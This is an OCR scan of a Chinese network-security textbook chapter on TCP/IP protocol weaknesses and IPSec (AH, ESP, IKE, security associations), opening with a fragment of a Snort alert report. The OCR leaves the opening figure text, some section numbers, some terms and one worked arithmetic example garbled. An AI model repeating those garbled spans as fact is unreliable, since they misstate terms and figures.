。 Source IP addresses: 5 a 
» Dest IP addresses: 4 
» Unique IP Iinks 11 ICMP @8%) 
Ll 
Source Ports: 
op. 四 UDP (0) Porscan Trafic OW) 
。 Dest Po 
谷中 UDP (四 
Search 
» Graph Alert data 
» Snapshot 
» Most recent Alerts ,UDP, » Most frequent5 Alerts 
dst 


» Most Frequent Source Ports: any , TCP , UDP 
。 Most Frequent Destination Ports: any , TCP , UDP 


ting; 
> Most recent 15 Uniaue Aleris 


图 12-13 ”Snort 的 检测 报告 


安全 协议 是 网 络 安全 体系 结构 中 的 核心 问题 之 一 ,是 将 密码 技术 应 用 于 网 络 安全 系统 
的 纽带 ,是 确保 网 络 信息 系统 安全 的 关键 。 


13.1 安全 协议 概述 
13.1.1 安全 协议 基本 概念 


1. 协议 
协议 是 指 两 个 或 多 个 参与 者 为 完成 某 项 特定 的 任务 而 采取 的 一 系列 步骤 。 
2. 通信 协议 


通信 协议 是 指 通信 各 方 关 于 通信 如 何 进行 所 达成 的 一 致 性 规则 , 即 由 参与 通信 的 各 方 
按 确定 的 步骤 做 出 一 系列 通信 动作 ,是 定义 通信 实体 之 间 交 换 信息 的 格式 及 意义 的 一 组 规 
则 。 它 包括 语法 .语义 和 同步 三 大 要 素 。 语 法 , 即 数据 与 控制 信息 的 结构 或 格式 ; 语义 , 即 
需要 发 出 何 种 控制 信息 ,完成 何 种 动作 以 及 做 出 何 种 响应 ; 同步 是 指 事件 实现 顺序 的 详细 
说 明 。 

3. 安全 协议 

安全 协议 是 指 通 过 信息 的 安全 交换 来 实现 某 种 安全 目的 所 共同 约定 的 逻辑 操作 规则 。 
简单 地 说 ,安全 协议 是 指 实现 某 种 安全 目的 的 通信 协议 ,所 以 又 称 为 安全 通信 协议 。 由 于 安 
全 协议 通常 要 用 到 密码 技术 ,所 以 又 称 为 密码 协议 。 

4. 网 络 安全 通信 协议 


网 络 安全 通信 协议 属于 安全 协议 ,是 指 在 计算 机 网 络 中 使 用 的 具有 安全 功能 的 通信 协 
议 , 也 就 是 说 ,通过 正确 地 使 用 密码 技术 和 访问 控制 等 技术 来 解决 网 络 中 信息 的 安全 交换 
问题 。 

根据 安全 协议 的 概念 ,安全 协议 除了 有 具有 协议 和 通信 协议 的 基本 特点 外 ,还 应 包括 以 下 
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基本 要 素 

(1) 保证 信息 交换 的 安全 ,其 目的 是 完成 某 种 安全 任务 。 

(2) 使 用 密码 技术 。 密 码 技术 是 安全 协议 保证 通信 安全 所 采用 的 核心 技术 ,例如 信息 
交换 的 机 密 性 完整 性 、 抗 否认 性 等 都 要 依赖 密码 技术 。 

(3) 具有 严密 的 共同 约定 的 逻辑 交换 规则 。 保 证 信息 安全 交换 除了 采用 密码 技术 以 
外 , 逻 辑 交 换 规则 是 否 严 密 , 即 协议 的 安全 交换 过 程 是 否 严密 都 十 分 重要 ,安全 协议 的 分 析 
往往 是 针对 这 一 部 分 来 进行 的 。 

(4) 使 用 访问 控制 等 安全 机 制 。 必 要 时 还 应 使 用 访问 控制 等 安全 机 制 ,IPSec 协议 在 进 
行 安全 通信 是 就 特别 强调 这 一 点 。 事 实 上 ,在 其 他 安全 协议 中 , 当 解密 失败 或 完整 性 检验 无 
法 通过 时 ,通常 都 会 丢弃 报 文 ,这 就 是 最 基本 的 访问 控制 。 


13.12 TCRPIP 安全 分 析 


由 于 人 们 认 知 与 实践 的 局 限 性 ,使 得 我 们 在 设计 计算 机 系统 及 信息 网 络 时 留 下 了 大 量 
的 安全 漏洞 ,成 为 导致 信息 安全 问题 的 根本 原因 。 而 在 这 些 漏洞 当中 ,协议 的 漏洞 又 是 最 主 
要 的 。 由 于 TCP/IP 协议 簇 在 早期 设计 时 是 以 面向 应 用 为 根本 目的 ,因此 未 能 充分 考虑 到 
安全 性 及 协议 自身 的 脆弱 性 \ 不 完备 性 ,导致 网 络 中 存在 着 许多 可 能 遭受 攻击 的 漏洞 。 这 些 
潜在 的 隐患 使 得 攻击 者 可 以 利用 存在 的 漏洞 来 对 攻击 目标 进行 恶意 的 连接 ,操作 ,从 而 可 以 
达到 获取 重要 信息 ,提升 控制 权限 等 非 授 权 目 的 。 


1. 网 络 层 协议 的 安全 隐患 


在 TCP/IP 体系 结构 的 网 络 层 ,最 重要 的 协议 就 是 IP 协议 ,用 来 使 互联 起 来 的 许多 计 
算 机 网 络 能 够 进行 通信 。 

然而 ,IP 协议 在 实现 通信 的 过 程 中 并 不 能 为 数据 提供 完整 性 和 机 密 性 保护 ,缺少 基于 
IP 地 址 的 身份 认证 机 制 ,容易 遭 到 IP 地 址 欺骗 攻击 。 因 此 ,IP 地 址 假冒 成 为 IP 协议 的 主 
要 安全 问题 。 由 于 使 用 TCP/IP 协议 的 主机 假设 所 有 以 合法 IP 地 址 发 送 的 数据 包 都 是 有 
效 的 。 理 论 上 对 于 一 个 IP 数据 包 是 否 来 自 真正 的 源 地 址 ,IP 协议 并 不 做 任何 保障 。 这 意 
味 着 任何 一 台 计 算 机 都 可 以 发 送 包 含 任意 源 地 址 的 数据 包 ,IP 数据 包 中 的 源 地 址 是 不 可 
信 的 。 

IP 协议 的 另 一 个 安全 问题 是 利用 源 路 由 选项 进行 攻击 。 源 路 由 指定 了 IP 数据 包 必 须 
经 过 的 路 径 , 可 以 测试 某 一 特定 网 络 路 径 的 吞吐 量 , 或 使 IP 数据 包 选 择 一 条 更 安全 可 靠 的 
路 由 。 但 源 路 由 选项 使 得 入 侵 者 能 够 绕 开 某 些 网 络 安全 措施 而 通过 对 方 没有 防备 的 路 径 攻 
击 目标 主机 。 

此 外 ,IP 协议 还 存在 重组 IP 分 片 包 的 威胁 。 虽然 IP 首部 的 长 度 字段 限制 了 包 长 度 最 
大 为 65 535 字 节 ,但 对 于 分 片 包 而 言 ,多 个 分 片 包 组 合 起 来 是 有 可 能 大 于 65 535 字 节 的 ,而 
IP 协 议 并 没有 检查 机 制 ,从 而 造成 溢出 。 著 名 的 Ping 攻击 就 是 利用 这 一 安全 隐患 来 实 
施 的 。 
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2. 传输 层 协 议 的 安全 隐患 


TCP/IP 体系 结构 传输 层 的 两 个 协议 是 TCP 协议 和 UDP 协议 ,这 两 个 协议 都 存在 着 
各 自 的 安全 隐患 。 

(1) TCP 协议 的 安全 隐患 

TCP 协议 是 面向 连接 的 协议 ,必须 通过 三 次 握手 来 建立 一 个 TCP 连接 。 但 在 完成 三 
次 握手 的 过 程 中 ,有 时 会 出 现 服务 器 端的 一 个 异常 线程 等 待 。 如 果 大 量 发 生 这 种 情况 ,服务 
器 端 就 会 为 了 维持 大 量 的 半 连 接 列 表 而 耗费 一 定 的 资源 。 当 达到 TCP 处 理 上 限时 ,TCP 
将 拒绝 所 有 连接 请 求 , 表 现 为 服务 器 失去 响应 。 

另外 , 当 两 台 计 算 机 按照 TCP 协议 连接 后 ,该 协议 会 生成 一 些 初始 序列 号 ,可 以 提供 计 
算 机 网 络 设备 间 的 连接 信息 ,但 这 些 序列 号 并 不 是 随机 产生 的 ,有 许多 平台 可 以 计算 出 这 些 
序列 号 。 攻 击 者 可 以 利用 这 一 漏洞 控制 互联 网 或 企业 内 部 网 上 基于 TCP 协议 的 连接 ,并 对 
计算 机 网 络 实施 多 种 类 型 的 攻击 。 

(2) UDP 协议 的 安全 隐患 

UDP 协议 是 一 种 不 可 靠 的 传输 层 协议 , 它 依赖 于 IP 协议 传送 报 文 , 且 不 确认 报 文 是 否 
到 达 , 不 对 报 文 排序 也 不 进行 流量 控制 ,对 于 顺序 错误 或 丢失 的 包 , 也 不 做 纠 错 和 重 传 。 
UDP 协议 没有 建立 初始 化 连接 ,因此 欺骗 UDP 包 比 欺骗 TCP 包 更 加 容易 ,与 UDP 相关 的 
服务 面临 着 更 大 的 威胁 。 


3. 应 用 层 协议 的 安全 隐患 


直接 面 对 最 终 用 户 的 应 用 层 上 的 网 络 应 用 和 服务 种 类 众多 ,实现 差异 很 大 ,每 一 种 应 用 
都 有 各 自 特定 的 安全 问题 。 面 向 当前 大 量 的 网 络 应 用 服务 ,应 用 层 协议 多 而 且 复 杂 。 

应 用 层 协议 的 安全 隐患 主要 存在 于 两 个 方面 ,一 是 大 部 分 以 超级 管理 员 的 权限 运行 ,一 
且 这 些 程序 存在 安全 漏洞 且 被 攻击 者 利用 , 极 有 可 能 取得 整个 系统 的 控制 权 。 二 是 许多 协 
议 采 用 简单 的 身份 认证 方式 ,并 且 在 网 络 中 以 明文 方式 传输 。 
正 是 由 于 这 些 漏洞 的 存在 ,网 络 系统 受到 了 严重 的 威胁 ,安全 事件 层出不穷 ,出 现 了 许 
多 针对 协议 的 典型 攻击 。 如 SYN Flood 攻击 、TCP 序列 号 猜测 IP 地 址 欺骗 .TCP 会 话 动 
持 、 路 由 欺骗 ,DNS 欺骗 .ARP 欺骗 .UDP Flood 攻击 以 及 Ping of Death 攻击 等 。 


13.1.3 TCPIP 安全 架构 


为 了 解决 TCP/IP 协议 簇 的 安全 问题 ,弥补 TCP/IP 协议 簇 在 设计 之 初 对 安全 功能 的 
考虑 不 足 , 以 Internet 工程 任务 组 (IETF) 为 代表 的 相关 组 织 不 断 通过 对 现 有 协议 的 改进 和 
设计 新 的 安全 通信 协议 来 对 现 有 的 TCP/IP 协议 簇 提供 相关 的 安全 保证 ,在 Internet 安全 
性 研究 方面 取得 了 积极 进展 。 由 于 TCP/IP 各 层 协 议 提 供 的 功能 不 同 ,面向 各 层 提 供 的 安 
全 保证 也 不 同 ,人 们 在 协议 的 不 同 层次 设计 了 相应 的 安全 通信 协议 ,用 来 保障 网 络 各 个 层次 
的 安全 。 目 前 ,在 TCP/IP 的 安全 体系 结构 中 ,从 链 路 层 、 网 络 层 \ 传 输 层 到 应 用 层 , 已 经 出 
现 了 一 系列 相应 的 安全 通信 协议 。 从 而 形成 了 由 各 层 安全 通信 协议 构成 的 TCP/IP 协议 得 
的 安全 架构 ,如 图 13-1 所 示 。 
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图 13-1 TCP/IP 的 安全 体系 结构 


数据 链 路 层 安全 通信 协议 负责 提供 通过 通信 和 链 路 连接 起 来 的 主机 或 路 由 器 之 间 的 安全 
保证 ,该 层 安 全 通信 协议 主要 有 PPTP、L2TP 等 ,主要 优点 是 效率 高 ,主要 缺点 是 不 通用 、 扩 
展 性 不 强 。 

网 络 层 安全 通信 协议 主要 是 解决 网 络 层 通信 的 安全 问题 ,对 于 TCP/IP 协议 来 说 ,就 是 
解决 IP 协议 的 安全 问题 。 现 阶段 ,IPSec 是 最 为 主要 的 网 络 层 安全 通信 协议 。 主 要 优点 是 
对 网 络 层 以 上 各 层 透明 性 好 ,主要 缺点 是 很 难 提供 不 可 否认 服务 。 

传输 层 安全 通信 协议 主要 是 实现 传输 层 的 安全 通信 ,主要 有 SSL 和 TLS 等。 传输 层 
的 安全 只 可 在 端 系统 实现 。 可 以 提供 基于 进程 与 进程 的 安全 通信 ,但 主要 缺点 是 需要 对 应 
程序 进行 修改 ,提供 安全 的 透明 性 不 好 。 

应 用 层 安全 通信 协议 主要 是 根据 诸如 电子 邮件 .电子 交易 等 特定 应 用 的 安全 需求 及 特 
点 而 设计 的 安全 协议 ,主要 有 S/MIME、PGP、SET、SNMP、S-HTTP 等 。 这 些 应 用 层 的 安 
全 措施 必须 在 端 系统 及 主机 上 实施 。 其 主要 优点 是 可 以 更 紧密 地 结合 具体 应 用 的 安全 需求 
和 特点 ,提供 针对 性 更 强 的 安全 功能 和 服务 ,但 主要 缺点 也 由 此 引起 , 它 针 对 每 个 应 用 都 需 
要 单独 设计 一 套 安全 机 制 。 

至 于 需要 在 哪 一 层 采用 什么 安全 通信 协议 , 则 应 综合 考虑 应 用 对 安全 保密 的 具体 要 求 、 
每 一 层 实现 安全 功能 的 特点 以 及 其 他 相关 因素 。 

章 的 后 续 内 容 将 对 网 络 层 ,传输 层 和 应 用 层 的 代表 性 安全 协议 进行 介绍 。 


132 IPSec 协议 


为 了 改善 现 有 IPv4 协议 在 安全 等 方面 的 不 足 , IETF (Internet Engineering Task 
Force) 的 下 一 代 网 络 协议 (IPng) 工 作 组 于 1995 年 底 确定 了 IPng 协议 规范 , 称 为 IP 版 本 
6(IPv6)。IPSec(IP Security) 产 生 于 IPv6 的 制定 之 中 ,用 于 提供 IP 层 的 安全 性 。 由 于 所 有 
支持 TCP/IP 协议 的 主机 进行 通信 时 ,都 要 经 过 IP 层 的 处 理 ,所 以 提供 了 IP 层 的 安全 性 就 
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相当 于 为 整个 网 络 提供 了 安全 通信 的 基础 。 

IPv6 利用 新 的 网 络 安全 体系 结构 IPSec 通过 验证 报头 (Authentication Header,AH) 和 
封装 安全 有 效 负载 (Encapsulating Security Payload, ESP) 两 个 安全 协议 分 别 为 IP 协议 提 
供 了 基于 无 连接 的 数据 完整 性 和 数据 保密 性 ,加 强 了 IP 协议 的 安全 ,克服 了 原 有 IPv4 协议 
安全 的 不 足 。 

IPv6 为 IP 数据 提供 了 在 IP 层 上 实现 数据 完整 性 \ 数 据 保密 性 、 认 证 ,访问 控制 和 不 可 
否认 性 等 安全 服务 ,同时 实现 IP 网 络 的 通信 安全 。 

鉴于 IPv4 的 应 用 仍然 很 广泛 ,所 以 后 来 在 IPSec 的 制定 中 也 增添 了 对 IPv4 的 支持 。 
IPSec 提供 既 可 用 于 IPv4 也 可 用 于 IPv6 的 安全 性 机 制 , 它 是 IPv6 的 一 个 组 成 部 分 ,也 是 
IPv4 的 一 个 可 选 扩展 协议 。 

IETF 从 1995 年 8 月 陆续 公布 了 一 系列 关于 IPSec 的 RFC 建议 标准 ,包括 : 

(1) Internet 协议 安全 结构 (RFC2401)。 

(2) IP 鉴别 头 (RFC2402)。 

(3) IP 封装 安全 载荷 (RFC2406)。 

(4) Internet 密 钥 交换 (RFC2409)。 

(5) ESP DES-CBC 交换 (RFC1829)。 

(6) ESP 和 AH 中 HMAC-MD5-96 的 采用 (RFC2403)。 

(7) ESP 和 AH 中 HMAC-SHA-1-96 的 采用 (RFC2404)。 

IPSec 的 内 容 相当 丰富 ,定义 的 协议 也 非常 多 ,除了 上 面 所 列 的 核心 协议 之 外 ,还 包含 
许多 其 他 内 容 。 完 整 的 文档 列表 可 参阅 RFC2411。 

IPSec 协议 工作 在 网 络 层 。 


1321 基本 概念 和 术语 


1. 安全 关联 


为 了 正确 封装 和 提取 IPSec 的 数据 包 , 有 必要 采取 一 套 专门 的 方案 ,将 安全 服务 、 密 钥 
等 与 要 保护 的 通信 数据 联系 在 一 起 ,这 样 的 构建 方案 称 为 安全 关联 (Security Association， 
SA)。SA 是 IPSec 的 一 个 重要 的 基本 概念 , 它 是 安全 协议 保护 通信 的 依据 ,包括 了 通信 的 
保护 模式 (传输 或 隧道 模式 ) ,加密 及 认证 算法 ,加密 及 认证 密 钥 以 及 密 钥 的 生存 期 等 安全 信 
息 参数 ,安全 协议 ESP 和 AH 的 执行 都 依赖 于 SA, 它 由 密 钥 管理 协议 协商 产生 。 

IPSec 的 SA 是 发 送 者 和 接收 者 两 个 IPSec 系统 之 间 的 一 个 单 向 逻辑 连接 。 所 谓 单 向 ， 
就 是 它 仅 朝 一 个 方向 定义 安全 服务 ,要么 对 通信 实体 外 送 的 包 进 行 保护 ,要 么 对 实体 收 到 的 
包 进 行 保护 。 若 要 在 一 个 对 等 系统 间 进 行 源 和 目的 的 双向 安全 通信 , 则 需要 两 个 SA, 因此 
SA 通常 都 是 以 对 的 形式 存在 的 。 一 个 SA 通常 由 以 下 参数 定义 。 

(1) AH 使 用 的 认证 算法 和 算法 模式 。 

(2) AH 认证 算法 使 用 的 密 钥 。 

(3) ESP 加 密 算 法 使 用 的 密 钥 以 及 密码 同步 初始 化 向 量 字段 及 其 大 小 。 
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(4) ESP 变换 使 用 的 认证 算法 和 算法 模式 。 

(5) 认证 算法 使 用 的 认证 密 钥 。 

(6) 密 钥 的 生存 期 。 

(7) SA 的 生存 期 及 源 地址 。 

安全 关联 SA 通过 一 个 三 元 组 (安全 参数 索引 SPI、 目 的 IP 地 址 和 安全 协议 AH 或 
ESP) 来 唯一 标识 。 一 个 SA 为 其 所 携带 的 业务 流 仅 提供 一 种 安全 机 制 (AH 或 ESP) ,因此 
若 要 对 特定 的 业务 流 提 供 多 种 安全 保护 ,就 要 有 多 个 SA 序列 组 合 。 

在 IP 安全 体系 中 ,为 了 处 理 IP 业务 而 定义 了 一 个 通用 模型 ,该 模型 中 有 两 个 与 SA 相 
关 的 数据 库 , 即 安全 策略 数据 库 (SPD) 和 安全 关联 数据 库 (SAD)。 实 现 IPSec 必须 维护 这 
两 个 数据 库 。 

(1) 安全 策略 数据 库 : 该 数据 库 定义 了 对 所 有 出 入 业务 应 采取 的 安全 策略 , 它 指 明了 
为 IP 数据 包 提供 什么 服务 以 及 以 什么 方式 提供 。 对 所 有 进入 或 离开 IP 协议 栈 的 数据 包 都 
必须 检索 SPD 数据 库 。 对 一 个 SPD 条 目 来 说 , 它 对 出 入 IP 数据 包 处 理 定 义 了 三 种 可 能 的 
选择 , 即 丢弃 、 绕 过 或 应 用 。 

(2) 安全 关联 数据 库 (SADB) : SADB 为 进入 和 外 出 包 处 理 维 持 一 个 活动 的 SA 列表 。 
外 出 SA 用 来 保障 外 出 包 的 安全 ,进入 SA 用 来 处 理 带 有 IPSec 头 的 进入 包 。SADB 是 各 个 
SA 聚集 在 一 起 形成 的 ,要 么 手工 管理 ,要 么 通过 IKE 这 样 的 自动 密 钥 管 理 系 统 来 进行 
管理 。 


2. 隧道 


隧道 就 是 把 一 个 包 封 装 在 另 一 个 新 包 中 ,整个 源 数据 包 作为 新 包 的 有 效 载荷 部 分 ,并 在 
前 面 添加 一 个 新 的 IP 头 。 这 个 新 IP 头 的 目的 地 址 通常 是 IPSec 防火 墙 \ 安 全 网 关 或 路 由 
器 。 通 过 隧道 技术 可 以 对 外 隐藏 内 部 数据 和 网 络 细节 。 对 IPSec 而 言 ,IP 隧道 的 直接 目标 
就 是 对 整个 IP 数据 包 提供 完整 的 保护 。 


3. Internet 安全 关联 和 密 钥 管理 协议 


Internet 安全 关联 和 密 钥 管理 协议 (Internet Security Association and Key 
Management Protocol,ISAKMP) 是 与 IPSec 密切 相关 的 一 个 协议 , 它 为 Internet 环境 下 安 
全 协议 使 用 的 安全 关联 和 密 钥 的 创建 定义 了 一 个 标准 通用 框架 ,定义 了 密 钥 管理 表述 语言 
通用 规则 及 要 求 。 


4. 解释 域 


解释 域 (Domain Of Interpretation ,DOIT) 是 Internet 编号 分 配 机 构 IANA 给 出 的 一 个 
命名 空间 。 它 为 使 用 ISAKMP 进行 安全 关联 协商 的 协议 统一 分 配 标识 符 。 共 享 一 个 DOI 
的 协议 从 一 个 共同 的 命名 空间 中 选择 安全 协议 和 密码 变换 、 共 享 密 钥 以 及 交换 协议 标识 符 
等 ,从 而 能 使 用 相同 DOI 的 协议 对 该 DOI 下 的 载荷 数据 内 容 做 出 统一 的 解释 。 一 个 针对 具 
体 协 议 的 DOI( 如 IPSec DOI) 还 规定 一 些 附加 的 安全 处 理 规 则 ,如 其 他 密 钥 交 换 序列 (也 就 
是 密 钥 生 成 方案 ) ,初始 化 向 量 的 计算 规则 等 。 

为 了 IPSec 通信 两 端 相 互 交互 ,IPSec 载荷 (AH 载荷 或 ESP 载荷 ) 中 各 字段 的 取 值 应 
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该 对 双方 都 可 理解 ,因此 通信 双方 必须 保持 对 通信 消息 相同 的 解释 规则 , 即 应 持 有 相同 的 解 
释 域 DOI。IPSec 至 少 已 给 出 了 两 个 解释 域 : IPSec DOI、ISAKMP DOI, 它 们 各 有 不 同 的 使 
用 范围 。 


1322 IPSec 组 成 


IPSec 协议 组 包含 AH 协议 .ESP 协议 和 密 钥 的 交换 标准 (Internet Key Exchange， 
IKE) 协 议 。 其 中 AH 协议 定义 了 认证 的 应 用 方法 ,提供 数据 源 认证 和 完整 性 保证 ; ESP 协 
议定 义 了 加 密 和 可 选 认证 的 应 用 方法 ,提供 可 靠 性 保证 。 在 实际 进行 IP 通信 时 ,可 以 根据 
实际 安全 需求 同时 使 用 这 两 种 协议 或 选择 使 用 其 中 的 一 种 。AH 和 ESP 都 可 以 提供 认证 
服务 ,不 过 AH 提供 的 认证 服务 要 强 于 ESP。IKE 用 于 密 钥 交换 。 


1. AH 协议 


设计 AH 协议 的 主要 目的 是 用 来 增加 IP 数据 包 完 整 性 的 认证 机 制 。 尽 管 IP 报头 中 的 
“ 校 验 和 ?字段 用 于 保证 IP 数据 包 的 完整 性 ,但 这 种 完整 性 保护 非常 弱 , 因 为 IP 报头 很 容易 
修改 。AH 就 是 要 为 IP 数据 流 提供 高 强度 的 密码 认证 ,以 确保 被 修改 过 的 数据 包 可 以 被 检 
查 出 来 。 

AH 协议 为 IP 通信 提供 数据 源 认 证 ,数据 完整 性 和 抗 重 放 保证 , 它 能 保护 通信 免 受 算 
改 , 但 不 能 防止 窃听 ,适合 用 于 传输 非 机 密 数 据 。AH 的 工作 原理 是 在 每 一 个 数据 包 上 添加 
一 个 身份 验证 报头 。 此 报头 包含 一 个 被 加 密 的 Hash 值 (可 以 将 其 当做 数字 签名 ,只 是 它 不 
使 用 证 书 ) ,此 Hash 值 在 整个 数据 包 中 计算 ,因此 对 数据 的 任何 更 改 将 导致 Hash 值 无 效 ， 


这 样 就 提供 了 完整 性 保护 。 0 8 16 31 
AH 报头 位 置 在 IP 报头 和 传输 层 协议 头 之 “| 下 一 个 头 | 载荷 长 度 保留 

间 。AH 由 协议 号 51 标识 ,该 值 包含 在 AH 报 安全 参数 索引 

头 之 前 的 IP 报头 中 。AH 可 以 单独 使 用 ,也 可 序列 号 

以 与 ESP 协议 结合 使 用 。 认证 数据 


AH 报头 结构 如 图 13-2 所 示 。 

(1) 下 一 个 头 (Next Header): 8 位 ,标识 下 
一 个 使 用 IP 协议 号 的 报头 类 型 ,其 取 值 在 RFC1700 中 定义 。 例 如 ,Next Header 值 等 于 6， 
表示 紧 接 其 后 的 是 TCP 报头 ; Next Header 值 等 于 50, 表 示 紧 接 其 后 的 是 ESP 报头 。 

(2) 载荷 长 度 (Payload Length): 8 位 ,表示 以 32 位 为 单位 的 AH 头 的 长 度 减 2。 例 
如 ,如果 认证 数据 的 长 度 为 3 个 字 节 ,认证 数据 前 面 的 5 个 字段 长 度 为 固定 长 度 3 个 字 , 则 
载荷 长 度 的 值 为 3 十 3 一 2 一 4。 减 2 是 因为 AH 是 一 个 IPv6 的 扩展 头 ,RFC1883 规定 ,计算 
IPv6 扩展 头 长 度 时 应 首先 从 头 长 度 中 减 去 一 个 64 位 的 字 , 相 当 于 2 个 32 位 的 字 。 

(3) 保留 (Reserved) : 16 位 , 供 将 来 使 用 。 值 为 0。 

(4) 安全 参数 索引 (Security Parameters Index,SPI) : 这 是 一 个 为 数据 报 识别 安全 关联 
SA 的 32 位 伪 随 机 值 。SPI 值 0 被 保留 来 表明 “没有 安全 关联 存在 ”, 另 外 ,1 一 255 被 IANA 
保留 将 来 使 用 。 

(5) 序列 号 (Sequence Number): 从 1 开始 的 32 位 单 增 序 列 号 ,不 允许 重复 ,唯一 地 标 


图 13-2 AH 头 结构 
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识 了 每 一 个 发 送 数据 包 ,为 安全 关联 提供 抗 重 放 保护 。 接 收 端 校 验 序列 号 为 该 字段 值 的 数 
据 包 是 否 已 经 被 接收 过 ,若是 , 则 拒 收 该 数据 包 。 

(6) 认证 数据 (Authentication Data,AD): 长 度 可 变 , 但 必须 是 32 位 的 整数 倍 , 默 认 长 
度 为 96 位 。 包 含 了 数据 包 的 完整 性 校 验 值 ICV。AH 使 用 消息 认证 码 MAC 对 数据 包 进 
行 认证 , 它 根据 一 个 任意 长 的 消息 和 一 个 密 钥 ,生成 固定 长 度 的 消息 摘要 。 接 收 端 接收 数据 
包 后 ,采用 同样 的 认证 算法 进行 计算 ,再 与 发 送 端 所 计算 的 ICV 值 比较 , 若 两 者 相等 ,表示 
数据 完整 , 若 在 传输 过 程 中 数据 遭 修改 ,两 个 计算 结果 不 一 致 , 则 丢弃 该 数据 包 。 一 般 AH 
为 整个 数据 包 提供 完整 性 检查 ,但 如 果 IP 报头 中 包含 “生存 期 (Time To Live) ”或 “服务 类 
型 (Type of Service)” 等 值 可 变 字 段 , 则 在 进行 完整 性 检查 时 应 将 这 些 值 可 变 字段 去 除 。 


2. ESP 协议 


设计 ESP 协议 的 主要 目的 是 提高 IP 数据 包 的 安全 性 。ESP 的 作用 是 提供 机 密 性 保 
护 有 限 的 流 机 密 性 保护 .无 连接 的 完整 性 保护 ,数据 源 认证 和 抗 重 放 攻 击 等 安全 服务 。 和 
AH 一 样 ,通过 ESP 的 进入 和 外 出 处 理 还 可 以 提供 访问 控制 服务 。 实 际 上 ,ESP 提供 和 
AH 类 似 的 安全 服务 ,但 增加 了 数据 机 密 性 保护 和 有 限 的 流 机 密 性 保护 等 两 个 额外 的 安全 
服务 。 机 密 性 保护 服务 通过 使 用 密码 算法 加 密 IP 数据 包 的 相关 部 分 来 实现 , 流 机 密 性 保护 
服务 由 隧道 模式 下 的 机 密 性 保护 服务 来 提供 。 

ESP 的 加 密 服务 是 可 选 的 ,但 如 果 启 用 加 密 , 则 也 就 同时 选择 了 完整 性 检查 和 认证 。 
因为 如 果 仅 使 用 加 密 , 入 侵 者 就 可 能 伪造 包 以 发 动 密码 分 析 攻 击 。 

ESP 可 以 单独 使 用 ,也 可 以 和 AH 结合 使 用 。 一 般 ESP 不 对 整个 数据 包 加 密 , 而 是 只 
加 密 IP 包 的 有 效 载荷 部 分 ,不 包括 IP 头 。 但 在 端 对 端的 隧道 通信 中 ,ESP 需要 对 整个 数据 
包 加 密 。 

ESP 数据 包 格式 如 图 13-3 所 示 。 

0 8 16 24 31 
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图 13-3 ESP 数据 包 格 式 


(1) 安全 参数 索引 (SPI) : 32 位 整数 。 它 和 IP 头 的 目的 地 址 .ESP 协议 一 起 用 以 唯一 
标识 对 这 个 包 进行 ESP 保护 的 SA。 

(2) 序列 号 (Sequence Number): 从 1 开始 的 32 位 单 增 序列 号 ,不 允许 重复 ,唯一 地 标 
识 了 每 一 个 发 送 数据 包 ,为 安全 关联 提供 反 重 播 保护 。 接 收 端 校 验 序列 号 为 该 字段 值 的 数 
据 包 是 否 已 经 被 接收 过 ,若是 , 则 拒 收 该 数据 包 。 
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(3) 载荷 数据 : 长 度 不 固定 ,所 包含 的 是 由 下 一 个 头 字段 所 指示 的 数据 (如 整个 IP 数据 
包 、 上 层 协议 TCP 或 UDP 报 文 等 )。 如 果 使 用 机 密 性 保护 服务 ,该 字段 就 包含 所 要 保护 的 
实际 载荷 , 即 数据 包 中 需要 加 密 部 分 的 数据 ,然后 和 填充 项 .填充 项 长 度 以 及 下 一 个 头等 字 
段 一 起 被 加 密 。 如 果 采 用 的 加 密 算法 需要 初始 化 向 量 IV, 则 它 也 将 在 载荷 数据 字段 中 传 
输 , 并 由 算法 确定 IV 的 长 度 和 位 置 。 

(4) 填充 项 (Padding) : 如 果 加 密 算 法 要 求 明文 是 某 个 数字 的 整数 倍 , 则 通过 填充 可 将 
明文 扩充 到 所 需要 的 长 度 。 另 外 ,通过 填充 可 以 隐藏 载荷 数据 的 实际 长 度 , 从 而 对 流量 提供 
部 分 的 保密 性 。 

(5) 填充 项 长 度 (Padding Length): 8 位 ,表明 填充 项 字段 中 填充 以 字 节 为 单位 的 
长 度 。 

(6) 下 一 个 头 (Next Header) : 识别 下 一 个 使 用 IP 协议 号 的 报头 ,如 TCP 或 UDP。 

(7) 认证 数据 (Authentication Data) : 长 度 不 固定 ,存放 的 是 完整 性 校 验 值 ICV。 它 是 
对 除 认证 数据 字段 以 外 的 ESP 包 进 行 计算 获得 的 ,其 实际 长 度 取 决 于 采用 的 认证 算法 。 


3. IKE 协议 


IPSec 密 钥 管理 主要 是 由 IKE 协议 完成 。 用 IPSec 保护 一 个 IP 数据 流 之 前 ,必须 先 建 
立 一 个 安全 关联 SA。SA 可 以 手工 或 动态 创建 , 当 用 户 数量 不 多 ,而 且 密 钥 的 更 新 频率 不 
高 时 ,可 以 选择 使 用 手工 建立 的 方式 。 但 当 用 户 较 多 ,网 络 规模 较 大 时 ,就 应 该 选择 自动 方 
式 。IKE 就 是 IPSec 规定 的 一 种 用 于 动态 管理 和 维护 SA 的 协议 。 

IKE 的 基础 是 ISAKMP、Oakley 和 SKEME 三 个 协议 , 它 沿用 了 ISAKMP 的 基础 、 
Oakley 的 模式 以 及 SKEME 的 共享 和 密 钥 更 新 技术 。 更 要 强调 的 是 ,虽然 I SAKMP 称 为 
Internet 安全 关联 和 密 钥 管理 协议 ,但 它 定义 的 是 一 个 管理 框架 。ISAKMP 定义 了 双方 如 
何 沟通 ,如 何 构建 彼此 间 的 沟通 信息 ,还 定义 了 保障 通信 安全 所 需要 的 状态 交换 。ISAKMP 
提供 了 进行 身份 认证 的 方法 以 及 密 钥 交 换 时 交换 信息 的 方法 。 

由 于 IKE 以 ISAKMP 为 框架 ,所 以 它 使 用 了 两 个 交换 阶段 ,阶段 一 用 于 建立 IKE SA， 
阶段 二 利用 已 建立 的 IKE SA 为 IPSec 协商 具体 的 一 个 或 多 个 安全 关联 , 即 建立 IPSec SA。 
同时 ,IKE 定义 了 交换 模式 , 即 主 模式 野蛮 模式 ,快速 模式 和 新 群 模式 。 

IKE 允许 四 种 认证 方法 ,分 别 是 基于 数字 签名 的 认证 、 基 于 公 钥 加 密 的 认证 、 基 于 修订 
的 公 钥 加 密 的 认证 和 基于 预 共享 密 钥 的 认证 。 


1323 IPSec 的 工作 模式 


在 IPSec 协议 中 有 两 种 工作 模式 : 传输 模式 和 隧道 模式 。 这 两 种 模式 的 区 别 非常 直 
观 ,它们 保护 的 对 象 不 同 。 传 输 模 式 保护 的 是 IP 载荷 ,而 隧道 模式 保护 的 是 整个 IP 包 。 

